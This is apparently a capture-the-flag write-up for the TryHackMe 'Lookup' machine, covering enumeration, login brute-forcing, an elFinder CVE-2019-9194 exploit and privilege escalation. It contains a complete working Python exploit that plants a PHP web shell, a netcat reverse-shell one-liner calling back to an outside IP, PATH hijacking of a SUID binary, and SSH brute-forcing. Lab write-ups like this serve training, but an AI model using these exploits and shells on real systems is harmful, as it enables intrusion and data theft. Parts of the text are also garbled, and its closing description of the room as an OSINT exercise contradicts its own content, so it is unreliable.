THM Lookup - Linux (Easy)

A Linux machine that will teaches us to learn how to exploit web application vulnerabilities, such as command injection, and understand the secure coding practices. Linux, Decoding, and HTTPs Attacks.

1. Enumeration and Network scanning

┌──(kali㉿kali)-[~]
└─$ cat nmap-result.log 
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://lookup.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)

2. Hidden Directory Scanning

┌──(kali㉿kali)-[~]
└─$ ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.lookup.thm" -u http://lookup.thm -fs 0

www                     [Status: 200, Size: 719, Words: 114, Lines: 27, Duration: 3901ms]

Great, we find a sub-domain.

lookup.thm www.lookup.thm

3. Login Attacks

However its still direct us into the same page, luckily many users and Admin use a weak passwords so we can brute-forces them with FFUF (the same kit we use for dir-busting)

Username: admin. Then I saw a change in the error message. admin, I have confirmed the existence of the account.

ffuf -w /wordlists -X POST -u http:// -d 'user&pass' -H "Content-Type" -fw 10

┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -u http://lookup.thm/login.php -d 'username=FUZZ&password=pass' -H "Content-Type: application/x-www-form-urlencoded" -fw 10

admin                   [Status: 200, Size: 62, Words: 8, Lines: 1, Duration: 242ms]
jose                    [Status: 200, Size: 62, Words: 8, Lines: 1, Duration: 242ms]

┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/rockyou.txt -X POST -u http://lookup.thm/login.php -d 'username=jose&password=FUZZ' -H "Content-Type: application/x-www-form-urlencoded" -fw 8

password123             [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 239ms]

Welp, we got Jose’s Credential

Username: joseIf Password: password123

And another sub-domain was found: files.lookup.thm

elFinder 2.1.47

Kinda crazy for a backend huh?

Was expecting this to be listed in VulnDB or Exploit-DB, sooo…. If you look at the vulnerability of this version is found.

4. CVE-2019-9194

CVE-2019-9194 | https://www.exploit-db.com/exploits/46481

It looks like a Command Injection from an Input (or could be an image upload) or File Upload Attacks, following the CVE I re-create my own (shell case):

#!/usr/bin/env python3

"""
Exploit Title: elFinder <= 2.1.47 - Command Injection. 
CVE: CVE-2019-9194

Usage: python3 exploit.py [URL]
"""

import sys
import json
import requests

PAYLOAD = (
    'SecSignal.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | '
    'xxd -r -p > SecSignal.php;echo SecSignal.jpg'
)

def usage():
    print(f"Usage: python3 {sys.argv[0]} [URL]")
    sys.exit(1)

def upload(url, payload):
    """Upload the malicious image file and return its hash."""
    try:
        with open('SecSignal.jpg', 'rb') as imgfile:
            files = {'upload[]': (payload, imgfile)}
            data = {
                "reqid": "1693222c439f4",
                "cmd": "upload",
                "target": "l1_Lw",
                "mtime[]": "1497726174"
            }
            response = requests.post(f"{url}/php/connector.minimal.php", files=files, data=data)
            response.raise_for_status()
            resp_json = response.json()
            return resp_json['added'][0]['hash']
    except Exception as e:
        print(f"[!] Upload failed: {e}")
        sys.exit(1)

def img_rotate(url, file_hash):
    """Trigger the image rotate (resize) to execute the payload."""
    params = {
        "target": file_hash,
        "width": "539",
        "height": "960",
        "degree": "180",
        "quality": "100",
        "bg": "",
        "mode": "rotate",
        "cmd": "resize",
        "reqid": "169323550af10c"
    }
    response = requests.get(f"{url}/php/connector.minimal.php", params=params)
    return response.text

def shell(url):
    """Interactive shell to execute commands via the uploaded webshell."""
    shell_url = f"{url}/php/SecSignal.php"
    try:
        r = requests.get(shell_url)
        if r.status_code == 200:
            print("[+] Pwned! :)")
            print("[+] Getting the shell...")
            while True:
                try:
                    cmd = input("$ ")
                    if cmd.strip() == "":
                        continue
                    r = requests.get(f"{shell_url}?c={cmd}")
                    print(r.text)
                except KeyboardInterrupt:
                    print("\nBye kaker!")
                    sys.exit(0)
        else:
            print("[*] The site seems not to be vulnerable :(")
    except Exception as e:
        print(f"[!] Shell request failed: {e}")

def main():
    if len(sys.argv) != 2:
        usage()
    url = sys.argv[1].rstrip("/")
    print("[*] Uploading the malicious image...")
    file_hash = upload(url, PAYLOAD)
    print("[*] Running the payload...")
    img_rotate(url, file_hash)
    shell(url)

if __name__ == "__main__":
    main()

CVE-2019-9194 is a critical command injection vulnerability affecting elFinder versions up to 2.1.47, specifically in its PHP connector component. This vulnerability allows an attacker to gain remote code execution by exploiting the way file uploads and image processing commands are handled. The provided Python exploit script demonstrates this by first uploading a specially crafted image file containing a payload that writes a PHP web shell to the server.

It then triggers the payload via the vulnerable image manipulation endpoint, effectively planting the shell. Finally, the script provides an interactive command-line interface, allowing the attacker to execute arbitrary commands on the compromised web server through the uploaded web shell, highlighting the seriousness of the vulnerability for any un-patched elFinder deployments.

5. CVE and Shell Uploading

┌──(kali㉿kali)-[~]
└─$ cve.py testupload.jpg      
����JFIF,,��VExifMM▒>(,,��,Photoshop 3.08BIMZ��
                                               �http://ns.adobe.com/xap/1.0/<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?>
<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 10.10'>
<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>

 <rdf:Description rdf:about=''

When the Python script is executed in www-data, I got the shell back.

┌──(kali㉿kali)-[~]
└─$ python2.7 cve.py http://files.lookup.thm/elFinder/
[*] Uploading the malicious image...
[*] Running the payload...
[+] Pwned! 
[+] Getting the shell...
$ whoami
www-data

Set up the river shell with nc and set up TTY.

┌──(kali㉿kali)-[~]
└─$ rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.6.55.144%201234%20%3E%2Ftmp%2Ff

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234

┌──(kali㉿kali)-[~]
└─$ python3 -c 'import pty; pty.spawn("bash")'

Target Shell

$ ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Jun  2  2023 .
drwxr-xr-x 19 root  root  4096 Jan 11  2024 ..
drwxr-xr-x  5 think think 4096 Jan 11  2024 think

6. Credential Harvesting

When you search for SUID in, try to look at /usr/sbin/pwm

$ find / -perm -u=s -type f 2>/dev/null

/usr/sbin/pwm

When you execute, id Run the command./home/<username>/.passwords

$ /usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found

Or Expand your searches

$ ls -la /home/think
ls -la /home/think
total 40
drwxr-xr-x 5 think think 4096 Jan 11  2024 .
drwxr-xr-x 3 root  root  4096 Jun  2  2023 ..
lrwxrwxrwx 1 root  root     9 Jun 21  2023 .bash_history -> /dev/null
-rwxr-xr-x 1 think think  220 Jun  2  2023 .bash_logout
-rwxr-xr-x 1 think think 3771 Jun  2  2023 .bashrc
drwxr-xr-x 2 think think 4096 Jun 21  2023 .cache
drwx------ 3 think think 4096 Aug  9  2023 .gnupg
-rw-r----- 1 root  think  525 Jul 30  2023 .passwords
-rwxr-xr-x 1 think think  807 Jun  2  2023 .profile
drw-r----- 2 think think 4096 Jun 21  2023 .ssh
lrwxrwxrwx 1 root  root     9 Jun 21  2023 .viminfo -> /dev/null
-rw-r----- 1 root  think   33 Jul 30  2023 user.txt

Hmmmm…. /usr/sbin/pwmBring it locally and decompile it with Ghidra id It is understood that the command is used with a relative path.

Also, extract the user name from the result of the id command,/home/<username>/.passwords I also knew you were manipulating it.

We can replace the id command,/home/think/.passwordsCreate a file for the process to be like, and pass it through the path.

$ echo '#!/bin/bash' > id
$ echo 'echo "uid=1000(think) gid=1000(think) groups=1000(think)"' >> id
$ chmod +x id
$ export PATH=/tmp:$PATH

Again. /usr/sbin/pwmWhen and /home/think/.passwords to be executed.

$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
jose1001teles

7. Credential Brute-forcing

in the password list that we got think and a password that we can used that for SSH login and Privilege escalation.

┌──(kali㉿kali)-[~]
└─$ hydra -f -l think -P think_pass lookup.thm ssh
[22][ssh] host: lookup.thm   login: think   password: josemario.AKA(think)

think (User) Successful SSH connection with your account.

┌──(kali㉿kali)-[~]
└─$ ssh think@lookup.thm
think@lookup:~$

8. Privilege escalation

$ sudo -l
[sudo] password for think: 
Matching Defaults entries for think on lookup:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User think may run the following commands on lookup:
    (ALL) /usr/bin/look

File read

It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.

• LFILE=file_to_read look '' "$LFILE"

SUID

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

• sudo install -m =xs $(which look) . LFILE=file_to_read ./look '' "$LFILE"

Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

• LFILE=file_to_read sudo look '' "$LFILE"

$ LFILE=/root/root.txt
$ sudo /usr/bin/look '' "$LFILE"
5a285a9fxxxxx

Welp amazing box from THM, I gotta say: the "Look Up" room on TryHackMe is a great choice for learners because it provides a practical, hands-on introduction to Open Source Intelligence (OSINT) techniques.

This room guides users through real-world scenarios where they gather publicly available information to solve challenges, such as tracking down usernames, emails, websites, and social media profiles. It’s beginner-friendly, requiring no prior experience, but still manages to teach critical skills valuable for penetration testing, cyber investigations, and digital forensics.

Happy Hacking!

• GitHub

• Mail